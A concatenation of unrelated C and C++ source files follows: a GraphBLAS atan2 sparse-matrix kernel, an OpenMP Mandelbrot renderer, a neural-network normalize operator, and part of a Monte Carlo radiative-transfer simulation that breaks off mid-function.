// D*A function (rowscale): (node)
// C+=B function (dense accum): GB_Cdense_accumB__atan2_fp64
// C+=b function (dense accum): GB_Cdense_accumb__atan2_fp64
// C+=A+B function (dense ewise3): (none)
// C=A+B function (dense ewise3): GB_Cdense_ewise3_noaccum__atan2_fp64
// C=scalar+B GB_bind1st__atan2_fp64
// C=scalar+B' GB_bind1st_tran__atan2_fp64
// C=A+scalar GB_bind2nd__atan2_fp64
// C=A'+scalar GB_bind2nd_tran__atan2_fp64
// C type: double
// A type: double
// B,b type: double
// BinaryOp: cij = atan2 (aij, bij)
#define GB_ATYPE \
double
#define GB_BTYPE \
double
#define GB_CTYPE \
double
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA) \
double aij = Ax [pA]
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB) \
double bij = Bx [pB]
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
double t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA) \
cij = Ax [pA]
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB) \
cij = Bx [pB]
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z, x, y, i, j) \
z = atan2 (x, y) ;
// op is second
#define GB_OP_IS_SECOND \
0
// op is plus_fp32 or plus_fp64
#define GB_OP_IS_PLUS_REAL \
0
// op is minus_fp32 or minus_fp64
#define GB_OP_IS_MINUS_REAL \
0
// GB_cblas_*axpy gateway routine, if it exists for this operator and type:
#define GB_CBLAS_AXPY \
(none)
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_ATAN2 || GxB_NO_FP64 || GxB_NO_ATAN2_FP64)
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
#if 0
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void (none)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
#endif
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
GrB_Info GB_Cdense_ewise3_noaccum__atan2_fp64
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_dense_ewise3_noaccum_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB_Cdense_accumB__atan2_fp64
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *GB_RESTRICT kfirst_slice,
const int64_t *GB_RESTRICT klast_slice,
const int64_t *GB_RESTRICT pstart_slice,
const int ntasks,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
#include "GB_dense_subassign_23_template.c"
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB_Cdense_accumb__atan2_fp64
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
{
// get the scalar b for C += b, of type double
double bwork = (*((double *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
#if 0
GrB_Info (none)
(
GrB_Matrix C,
const GrB_Matrix A, bool A_is_pattern,
const GrB_Matrix D, bool D_is_pattern,
const int64_t *GB_RESTRICT kfirst_slice,
const int64_t *GB_RESTRICT klast_slice,
const int64_t *GB_RESTRICT pstart_slice,
const int ntasks,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
double *GB_RESTRICT Cx = (double *) C->x ;
#include "GB_AxB_colscale_meta.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
#if 0
GrB_Info (node)
(
GrB_Matrix C,
const GrB_Matrix D, bool D_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
double *GB_RESTRICT Cx = (double *) C->x ;
#include "GB_AxB_rowscale_meta.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// eWiseAdd: C = A+B or C<M> = A+B
//------------------------------------------------------------------------------
#undef GB_FREE_ALL
#define GB_FREE_ALL \
{ \
GB_ek_slice_free (&pstart_Mslice, &kfirst_Mslice, &klast_Mslice) ; \
GB_ek_slice_free (&pstart_Aslice, &kfirst_Aslice, &klast_Aslice) ; \
GB_ek_slice_free (&pstart_Bslice, &kfirst_Bslice, &klast_Bslice) ; \
}
GrB_Info GB_AaddB__atan2_fp64
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool Ch_is_Mh,
const int64_t *GB_RESTRICT C_to_M,
const int64_t *GB_RESTRICT C_to_A,
const int64_t *GB_RESTRICT C_to_B,
const GB_task_struct *GB_RESTRICT TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t *pstart_Mslice = NULL, *kfirst_Mslice = NULL, *klast_Mslice = NULL ;
int64_t *pstart_Aslice = NULL, *kfirst_Aslice = NULL, *klast_Aslice = NULL ;
int64_t *pstart_Bslice = NULL, *kfirst_Bslice = NULL, *klast_Bslice = NULL ;
#include "GB_add_template.c"
GB_FREE_ALL ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C = A.*B or C<M> = A.*B
//------------------------------------------------------------------------------
GrB_Info GB_AemultB__atan2_fp64
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *GB_RESTRICT C_to_M,
const int64_t *GB_RESTRICT C_to_A,
const int64_t *GB_RESTRICT C_to_B,
const GB_task_struct *GB_RESTRICT TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t *pstart_Mslice = NULL, *kfirst_Mslice = NULL, *klast_Mslice = NULL ;
int64_t *pstart_Aslice = NULL, *kfirst_Aslice = NULL, *klast_Aslice = NULL ;
int64_t *pstart_Bslice = NULL, *kfirst_Bslice = NULL, *klast_Bslice = NULL ;
#include "GB_emult_template.c"
GB_FREE_ALL ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
GrB_Info GB_bind1st__atan2_fp64
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *GB_RESTRICT Bb,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
double *Cx = (double *) Cx_output ;
double x = (*((double *) x_input)) ;
double *Bx = (double *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Bb, p)) continue ;
double bij = Bx [p] ;
Cx [p] = atan2 (x, bij) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
GrB_Info GB_bind2nd__atan2_fp64
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *GB_RESTRICT Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
double *Cx = (double *) Cx_output ;
double *Ax = (double *) Ax_input ;
double y = (*((double *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
double aij = Ax [p] ;
Cx [p] = atan2 (aij, y) ;
}
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
double aij = Ax [pA] ; \
Cx [pC] = atan2 (x, aij) ; \
}
GrB_Info GB_bind1st_tran__atan2_fp64
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
int64_t *GB_RESTRICT *Workspaces,
const int64_t *GB_RESTRICT A_slice,
int nworkspaces,
int nthreads
)
{
// GB_unop_transpose.c uses GB_ATYPE, but A is
// the 2nd input to binary operator z=f(x,y).
#undef GB_ATYPE
#define GB_ATYPE \
double
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
double x = (*((const double *) x_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
#undef GB_ATYPE
#define GB_ATYPE \
double
}
//------------------------------------------------------------------------------
// C = op (A', y): transpose and apply a binary operator
//------------------------------------------------------------------------------
// cij = op (aij, y), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
double aij = Ax [pA] ; \
Cx [pC] = atan2 (aij, y) ; \
}
GrB_Info GB_bind2nd_tran__atan2_fp64
(
GrB_Matrix C,
const GrB_Matrix A,
const GB_void *y_input,
int64_t *GB_RESTRICT *Workspaces,
const int64_t *GB_RESTRICT A_slice,
int nworkspaces,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
double y = (*((const double *) y_input)) ;
#include "GB_unop_transpose.c"
return (GrB_SUCCESS) ;
#endif
}
#endif
|
openmp.h | /**
control OpenMP on the cmd line:
set OMP_NUM_THREADS = 16
*/
#pragma once
#ifdef OPENMP_FOUND
#include <omp.h>
#include "sequentiell.h"
#include "sse.h"
#include "intrinsics_helper.h"
namespace mandel
{
template<typename FLOAT_TYPE, typename RESULT_TYPE, typename PIXEL_TYPE = Pixel<FLOAT_TYPE>, typename TRANSFORM_TYPE = null_transform<RESULT_TYPE>>
struct CalcOpenMP : CalcMandelBrot < RESULT_TYPE >
{
virtual void doIt(const int width, const int height, const double dX1, const double dY1, const double dDx, const double dDy, std::vector<RESULT_TYPE> &picture) const
{
TRANSFORM_TYPE t;
PIXEL_TYPE pixel;
const auto x1 = static_cast<FLOAT_TYPE>(dX1);
const auto y1 = static_cast<FLOAT_TYPE>(dY1);
const auto dx = static_cast<FLOAT_TYPE>(dDx);
const auto dy = static_cast<FLOAT_TYPE>(dDy);
/*
#pragma omp parallel for
/*/
#pragma omp parallel for schedule(dynamic)
//#pragma omp parallel for schedule(guided)
//*/
for (int j = 0; j < height; ++j) {
const FLOAT_TYPE y = (j * dy) + y1;
for (int i = 0; i < width; ++i) {
const FLOAT_TYPE x = (i * dx) + x1;
auto iter = pixel(x, y);
auto index = i + j * width;
assert(0 <= index && index < (int)picture.size());
picture[index] = t(iter);
}
}
}
};
}
#endif
|
normalize_ref.c | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* License); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* AS IS BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
/*
* Copyright (c) 2021, OPEN AI LAB
* Author: jxyang@openailab.com
*/
#include "normalize_param.h"
#include "graph/tensor.h"
#include "graph/node.h"
#include "graph/graph.h"
#include "utility/sys_port.h"
#include "utility/float.h"
#include "utility/log.h"
#include "device/cpu/cpu_node.h"
#include "device/cpu/cpu_graph.h"
#include "device/cpu/cpu_module.h"
#include <math.h>
#include <string.h>
static void norm_channel(float* input, float* output, float* buffer, float* scale, int hw, int channel, int num_thread)
{
memset(buffer, 0, hw * sizeof(float));
//#pragma omp parallel for num_threads(num_thread)
for (int i = 0; i < channel; i++)
{
for (int j = 0; j < hw; j++)
{
float data = *(input + i * hw + j);
buffer[j] += (data * data);
}
}
//#pragma omp parallel for num_threads(num_thread)
for (int j = 0; j < hw; j++)
{
buffer[j] = 1.f / sqrt(buffer[j]);
}
//#pragma omp parallel for num_threads(num_thread)
for (int i = 0; i < channel; i++)
{
for (int j = 0; j < hw; j++)
{
float data = *(input + i * hw + j);
*(output + i * hw + j) = data * buffer[j] * scale[i];
}
}
}
static int init_node(struct node_ops* node_ops, struct exec_node* exec_node, struct exec_graph* exec_graph)
{
return 0;
}
static int release_node(struct node_ops* node_ops, struct exec_node* exec_node, struct exec_graph* exec_graph)
{
return 0;
}
static int run(struct node_ops* node_ops, struct exec_node* exec_node, struct exec_graph* exec_graph)
{
struct node* ir_node = exec_node->ir_node;
struct graph* ir_graph = ir_node->graph;
struct tensor* input_tensor = get_ir_graph_tensor(ir_graph, ir_node->input_tensors[0]);
struct tensor* output_tensor = get_ir_graph_tensor(ir_graph, ir_node->output_tensors[0]);
struct tensor* scale_tensor = get_ir_graph_tensor(ir_graph, ir_node->input_tensors[1]);
normalize_param_t* param = ( normalize_param_t* )(ir_node->op.param_mem);
float* input_org = ( float* )input_tensor->data;
float* output_org = ( float* )output_tensor->data;
float* sclae_org = ( float* )scale_tensor->data;
int batch_number = input_tensor->dims[0];
int channel_num = input_tensor->dims[1];
int channel_size = (input_tensor->dims[2]) * (input_tensor->dims[3]);
int img_size = channel_num * channel_size;
float* buffer = ( float* )sys_malloc(channel_size * sizeof(float));
if (param->channel_shared == 0 && param->across_spatial == 0)
{
for (int i = 0; i < batch_number; i++)
{
norm_channel(input_org, output_org, buffer, sclae_org, channel_size, channel_num, exec_graph->num_thread);
input_org += img_size;
output_org += img_size;
}
}
sys_free(buffer);
return 0;
}
static int score(struct node_ops* node_ops, struct exec_graph* exec_graph, struct node* exec_node)
{
return OPS_SCORE_BEST;
}
static struct node_ops normalize_node_ops = {.prerun = NULL,
.run = run,
.reshape = NULL,
.postrun = NULL,
.init_node = init_node,
.release_node = release_node,
.score = score};
int register_normalize_ref_op()
{
return register_builtin_node_ops(OP_NORMALIZE, &normalize_node_ops);
}
int unregister_normalize_ref_op()
{
return unregister_builtin_node_ops(OP_NORMALIZE, &normalize_node_ops);
}
|
cmontecarlo.c | #include <inttypes.h>
#ifdef WITHOPENMP
#include <omp.h>
#endif
#include "cmontecarlo.h"
/** Look for a place to insert a value in an inversely sorted float array.
*
* @param x an inversely (largest to lowest) sorted float array
* @param x_insert a value to insert
* @param imin lower bound
* @param imax upper bound
*
* @return index of the next boundary to the left
*/
static tardis_error_t
reverse_binary_search (const double *x, double x_insert,
int64_t imin, int64_t imax, int64_t * result)
{
/*
Have in mind that *x points to a reverse sorted array.
That is large values will have small indices and small ones
will have large indices.
*/
tardis_error_t ret_val = TARDIS_ERROR_OK;
if (x_insert > x[imin] || x_insert < x[imax])
{
ret_val = TARDIS_ERROR_BOUNDS_ERROR;
}
else
{
int imid = (imin + imax)>>1;
while (imax - imin > 2)
{
if (x[imid] < x_insert)
{
imax = imid + 1;
}
else
{
imin = imid;
}
imid = (imin + imax)>>1;
}
if (imax - imin == 2 && x_insert < x[imin + 1])
{
*result = imin + 1;
}
else
{
*result = imin;
}
}
return ret_val;
}
tardis_error_t
line_search (const double *nu, double nu_insert, int64_t number_of_lines,
int64_t * result)
{
tardis_error_t ret_val = TARDIS_ERROR_OK;
int64_t imin = 0;
int64_t imax = number_of_lines - 1;
if (nu_insert > nu[imin])
{
*result = imin;
}
else if (nu_insert < nu[imax])
{
*result = imax + 1;
}
else
{
ret_val = reverse_binary_search (nu, nu_insert, imin, imax, result);
*result = *result + 1;
}
return ret_val;
}
double
rpacket_doppler_factor (const rpacket_t *packet, const storage_model_t *storage)
{
return 1.0 -
rpacket_get_mu (packet) * rpacket_get_r (packet) *
storage->inverse_time_explosion * INVERSE_C;
}
/* Methods for calculating continuum opacities */
double
bf_cross_section(const storage_model_t * storage, int64_t continuum_id, double comov_nu)
{
// FIXME MR: this seems like it should not be used in production!
/* Temporary hardcoded values */
#define chi_bf_partial 0.25e-15
static const double cont_chi_bf[] = {chi_bf_partial, 0.0, 2.0 * chi_bf_partial, 0.3 * chi_bf_partial, 2.0 * chi_bf_partial};
#undef chi_bf_partial
/* End of temporary hardcoded values */
double sigma_bf = cont_chi_bf[continuum_id]; //storage->bf_cross_sections[continuum_id]
double tmp=storage->continuum_list_nu[continuum_id] / comov_nu;
return sigma_bf * tmp*tmp*tmp;
}
void calculate_chi_bf(rpacket_t * packet, storage_model_t * storage)
{
double doppler_factor = rpacket_doppler_factor (packet, storage);
double comov_nu = rpacket_get_nu (packet) * doppler_factor;
int64_t no_of_continuum_edges = storage->no_of_edges;
int64_t current_continuum_id;
line_search(storage->continuum_list_nu, comov_nu, no_of_continuum_edges, ¤t_continuum_id);
rpacket_set_current_continuum_id(packet, current_continuum_id);
int64_t shell_id = rpacket_get_current_shell_id(packet);
double T = storage->t_electrons[shell_id];
double boltzmann_factor = exp(-(H * comov_nu) / (KB*T));
double bf_helper = 0;
for(int64_t i = current_continuum_id; i < no_of_continuum_edges; i++)
{
// get the levelpopulation for the level ijk in the current shell:
double l_pop = storage->l_pop[shell_id * no_of_continuum_edges + i];
// get the levelpopulation ratio \frac{n_{0,j+1,k}}{n_{i,j,k}} \frac{n_{i,j,k}}{n_{0,j+1,k}}^{*}:
double l_pop_r = storage->l_pop_r[shell_id * no_of_continuum_edges + i];
bf_helper += l_pop * bf_cross_section(storage, i, comov_nu) * (1 - l_pop_r * boltzmann_factor);
// FIXME MR: Is this thread-safe? It doesn't look like it to me ...
storage->chi_bf_tmp_partial[i] = bf_helper;
}
rpacket_set_chi_boundfree(packet, bf_helper * doppler_factor);
}
double
compute_distance2boundary (rpacket_t * packet, const storage_model_t * storage)
{
double r = rpacket_get_r (packet);
double mu = rpacket_get_mu (packet);
double r_outer = storage->r_outer[rpacket_get_current_shell_id (packet)];
double r_inner = storage->r_inner[rpacket_get_current_shell_id (packet)];
double d_outer =
sqrt (r_outer * r_outer + ((mu * mu - 1.0) * r * r)) - (r * mu);
double d_inner;
if (rpacket_get_recently_crossed_boundary (packet) == 1)
{
rpacket_set_next_shell_id (packet, 1);
return d_outer;
}
else
{
double check = r_inner * r_inner + (r * r * (mu * mu - 1.0));
if (check < 0.0)
{
rpacket_set_next_shell_id (packet, 1);
return d_outer;
}
else
{
d_inner = mu < 0.0 ? -r * mu - sqrt (check) : MISS_DISTANCE;
}
}
if (d_inner < d_outer)
{
rpacket_set_next_shell_id (packet, -1);
return d_inner;
}
else
{
rpacket_set_next_shell_id (packet, 1);
return d_outer;
}
}
tardis_error_t
compute_distance2line (const rpacket_t * packet, const storage_model_t * storage,
double *result)
{
tardis_error_t ret_val = TARDIS_ERROR_OK;
if (rpacket_get_last_line (packet))
{
*result = MISS_DISTANCE;
}
else
{
double r = rpacket_get_r (packet);
double mu = rpacket_get_mu (packet);
double nu = rpacket_get_nu (packet);
double nu_line = rpacket_get_nu_line (packet);
double t_exp = storage->time_explosion;
double inverse_t_exp = storage->inverse_time_explosion;
int64_t cur_zone_id = rpacket_get_current_shell_id (packet);
double doppler_factor = 1.0 - mu * r * inverse_t_exp * INVERSE_C;
double comov_nu = nu * doppler_factor;
if (comov_nu < nu_line)
{
if (rpacket_get_next_line_id (packet) == storage->no_of_lines - 1)
{
fprintf (stderr, "last_line = %f\n",
storage->
line_list_nu[rpacket_get_next_line_id (packet) - 1]);
fprintf (stderr, "Last line in line list reached!");
}
else if (rpacket_get_next_line_id (packet) == 0)
{
fprintf (stderr, "First line in line list!");
fprintf (stderr, "next_line = %f\n",
storage->
line_list_nu[rpacket_get_next_line_id (packet) + 1]);
}
else
{
fprintf (stderr, "last_line = %f\n",
storage->
line_list_nu[rpacket_get_next_line_id (packet) - 1]);
fprintf (stderr, "next_line = %f\n",
storage->
line_list_nu[rpacket_get_next_line_id (packet) + 1]);
}
fprintf (stderr, "ERROR: Comoving nu less than nu_line!\n");
fprintf (stderr, "comov_nu = %f\n", comov_nu);
fprintf (stderr, "nu_line = %f\n", nu_line);
fprintf (stderr, "(comov_nu - nu_line) / nu_line = %f\n",
(comov_nu - nu_line) / nu_line);
fprintf (stderr, "r = %f\n", r);
fprintf (stderr, "mu = %f\n", mu);
fprintf (stderr, "nu = %f\n", nu);
fprintf (stderr, "doppler_factor = %f\n", doppler_factor);
fprintf (stderr, "cur_zone_id = %" PRIi64 "\n", cur_zone_id);
ret_val = TARDIS_ERROR_COMOV_NU_LESS_THAN_NU_LINE;
}
else
{
*result = ((comov_nu - nu_line) / nu) * C * t_exp;
}
}
return ret_val;
}
void
compute_distance2continuum(rpacket_t * packet, storage_model_t * storage)
{
double chi_freefree, chi_electron, chi_continuum, d_continuum;
if (storage->cont_status == CONTINUUM_ON)
{
calculate_chi_bf(packet, storage);
double chi_boundfree = rpacket_get_chi_boundfree(packet);
rpacket_set_chi_freefree(packet, 0.0);
chi_freefree = rpacket_get_chi_freefree(packet); // MR ?? this is always zero
chi_electron = storage->electron_densities[rpacket_get_current_shell_id(packet)] * storage->sigma_thomson *
rpacket_doppler_factor (packet, storage);
chi_continuum = chi_boundfree + chi_freefree + chi_electron;
d_continuum = rpacket_get_tau_event(packet) / chi_continuum;
}
else
{
// FIXME MR: an assignment to chi_freefree seems to be missing here
chi_electron = storage->electron_densities[rpacket_get_current_shell_id(packet)] * storage->sigma_thomson;
chi_continuum = chi_electron;
d_continuum = storage->inverse_electron_densities[rpacket_get_current_shell_id (packet)] *
storage->inverse_sigma_thomson * rpacket_get_tau_event (packet);
}
if (rpacket_get_virtual_packet(packet) > 0)
{
//Set all continuum distances to MISS_DISTANCE in case of an virtual_packet
rpacket_set_d_continuum(packet, MISS_DISTANCE);
rpacket_set_chi_boundfree(packet, 0.0);
rpacket_set_chi_electron(packet, chi_electron);
rpacket_set_chi_freefree(packet, 0.0);
rpacket_set_chi_continuum(packet, chi_continuum);
}
else
{
// fprintf(stderr, "--------\n");
// fprintf(stderr, "nu = %e \n", rpacket_get_nu(packet));
// fprintf(stderr, "chi_electron = %e\n", chi_electron);
// fprintf(stderr, "chi_boundfree = %e\n", calculate_chi_bf(packet, storage));
// fprintf(stderr, "chi_line = %e \n", rpacket_get_tau_event(packet) / rpacket_get_d_line(packet));
// fprintf(stderr, "--------\n");
rpacket_set_chi_freefree(packet, chi_freefree);
rpacket_set_chi_electron(packet, chi_electron);
rpacket_set_chi_continuum(packet, chi_continuum);
rpacket_set_d_continuum(packet, d_continuum);
}
}
int64_t
macro_atom (const rpacket_t * packet, const storage_model_t * storage, rk_state *mt_state)
{
int emit = 0, i = 0, probability_idx = -1;
int activate_level =
storage->line2macro_level_upper[rpacket_get_next_line_id (packet) - 1];
while (emit != -1)
{
double event_random = rk_double (mt_state);
i = storage->macro_block_references[activate_level] - 1;
double p = 0.0;
do
{
probability_idx = ((++i) * storage->no_of_shells +
rpacket_get_current_shell_id (packet));
p += storage->transition_probabilities[probability_idx];
}
while (p <= event_random);
emit = storage->transition_type[i];
activate_level = storage->destination_level_id[i];
}
return storage->transition_line_id[i];
}
double
move_packet (rpacket_t * packet, storage_model_t * storage, double distance)
{
double doppler_factor = rpacket_doppler_factor (packet, storage);
if (distance > 0.0)
{
double r = rpacket_get_r (packet);
double new_r =
sqrt (r * r + distance * distance +
2.0 * r * distance * rpacket_get_mu (packet));
rpacket_set_mu (packet,
(rpacket_get_mu (packet) * r + distance) / new_r);
rpacket_set_r (packet, new_r);
if (rpacket_get_virtual_packet (packet) <= 0)
{
double comov_energy = rpacket_get_energy (packet) * doppler_factor;
double comov_nu = rpacket_get_nu (packet) * doppler_factor;
#ifdef WITHOPENMP
#pragma omp atomic
#endif
storage->js[rpacket_get_current_shell_id (packet)] +=
comov_energy * distance;
#ifdef WITHOPENMP
#pragma omp atomic
#endif
storage->nubars[rpacket_get_current_shell_id (packet)] +=
comov_energy * distance * comov_nu;
}
}
return doppler_factor;
}
void
increment_j_blue_estimator (const rpacket_t * packet, storage_model_t * storage,
double d_line, int64_t j_blue_idx)
{
double r = rpacket_get_r (packet);
double r_interaction =
sqrt (r * r + d_line * d_line +
2.0 * r * d_line * rpacket_get_mu (packet));
double mu_interaction = (rpacket_get_mu (packet) * r + d_line) / r_interaction;
double doppler_factor = 1.0 - mu_interaction * r_interaction *
storage->inverse_time_explosion * INVERSE_C;
double comov_energy = rpacket_get_energy (packet) * doppler_factor;
#ifdef WITHOPENMP
#pragma omp atomic
#endif
storage->line_lists_j_blues[j_blue_idx] +=
comov_energy / rpacket_get_nu (packet);
}
int64_t
montecarlo_one_packet (storage_model_t * storage, rpacket_t * packet,
int64_t virtual_mode, rk_state *mt_state)
{
int64_t reabsorbed=-1;
if (virtual_mode == 0)
{
reabsorbed = montecarlo_one_packet_loop (storage, packet, 0, mt_state);
}
else
{
if ((rpacket_get_nu (packet) > storage->spectrum_virt_start_nu) && (rpacket_get_nu(packet) < storage->spectrum_virt_end_nu))
{
for (int64_t i = 0; i < rpacket_get_virtual_packet_flag (packet); i++)
{
double weight;
rpacket_t virt_packet = *packet;
double mu_min;
if (rpacket_get_r(&virt_packet) > storage->r_inner[0])
{
mu_min =
-1.0 * sqrt (1.0 -
(storage->r_inner[0] / rpacket_get_r(&virt_packet)) *
(storage->r_inner[0] / rpacket_get_r(&virt_packet)));
}
else
{
mu_min = 0.0;
}
double mu_bin = (1.0 - mu_min) / rpacket_get_virtual_packet_flag (packet);
rpacket_set_mu(&virt_packet,mu_min + (i + rk_double (mt_state)) * mu_bin);
switch (virtual_mode)
{
case -2:
weight = 1.0 / rpacket_get_virtual_packet_flag (packet);
break;
case -1:
weight =
2.0 * rpacket_get_mu(&virt_packet) /
rpacket_get_virtual_packet_flag (packet);
break;
case 1:
weight =
(1.0 -
mu_min) / 2.0 / rpacket_get_virtual_packet_flag (packet);
break;
default:
fprintf (stderr, "Something has gone horribly wrong!\n");
// FIXME MR: we need to somehow signal an error here
// I'm adding an exit() here to inform the compiler about the impossible path
exit(1);
}
double doppler_factor_ratio =
rpacket_doppler_factor (packet, storage) /
rpacket_doppler_factor (&virt_packet, storage);
rpacket_set_energy(&virt_packet,
rpacket_get_energy (packet) * doppler_factor_ratio);
rpacket_set_nu(&virt_packet,rpacket_get_nu (packet) * doppler_factor_ratio);
reabsorbed = montecarlo_one_packet_loop (storage, &virt_packet, 1, mt_state);
if ((rpacket_get_nu(&virt_packet) < storage->spectrum_end_nu) &&
(rpacket_get_nu(&virt_packet) > storage->spectrum_start_nu))
{
#ifdef WITHOPENMP
#pragma omp critical
{
#endif
if (storage->virt_packet_count >= storage->virt_array_size)
{
storage->virt_array_size *= 2;
storage->virt_packet_nus = realloc(storage->virt_packet_nus, sizeof(double) * storage->virt_array_size);
storage->virt_packet_energies = realloc(storage->virt_packet_energies, sizeof(double) * storage->virt_array_size);
storage->virt_packet_last_interaction_in_nu = realloc(storage->virt_packet_last_interaction_in_nu, sizeof(double) * storage->virt_array_size);
storage->virt_packet_last_interaction_type = realloc(storage->virt_packet_last_interaction_type, sizeof(int64_t) * storage->virt_array_size);
storage->virt_packet_last_line_interaction_in_id = realloc(storage->virt_packet_last_line_interaction_in_id, sizeof(int64_t) * storage->virt_array_size);
storage->virt_packet_last_line_interaction_out_id = realloc(storage->virt_packet_last_line_interaction_out_id, sizeof(int64_t) * storage->virt_array_size);
}
storage->virt_packet_nus[storage->virt_packet_count] = rpacket_get_nu(&virt_packet);
storage->virt_packet_energies[storage->virt_packet_count] = rpacket_get_energy(&virt_packet) * weight;
storage->virt_packet_last_interaction_in_nu[storage->virt_packet_count] = storage->last_interaction_in_nu[rpacket_get_id (packet)];
storage->virt_packet_last_interaction_type[storage->virt_packet_count] = storage->last_interaction_type[rpacket_get_id (packet)];
storage->virt_packet_last_line_interaction_in_id[storage->virt_packet_count] = storage->last_line_interaction_in_id[rpacket_get_id (packet)];
storage->virt_packet_last_line_interaction_out_id[storage->virt_packet_count] = storage->last_line_interaction_out_id[rpacket_get_id (packet)];
storage->virt_packet_count += 1;
int64_t virt_id_nu =
floor ((rpacket_get_nu(&virt_packet) -
storage->spectrum_start_nu) /
storage->spectrum_delta_nu);
storage->spectrum_virt_nu[virt_id_nu] +=
rpacket_get_energy(&virt_packet) * weight;
#ifdef WITHOPENMP
}
#endif
}
}
}
else
{
return 1;
}
}
return reabsorbed;
}
void
move_packet_across_shell_boundary (rpacket_t * packet,
storage_model_t * storage, double distance, rk_state *mt_state)
{
move_packet (packet, storage, distance);
if (rpacket_get_virtual_packet (packet) > 0)
{
double delta_tau_event = rpacket_get_chi_continuum(packet) * distance;
rpacket_set_tau_event (packet,
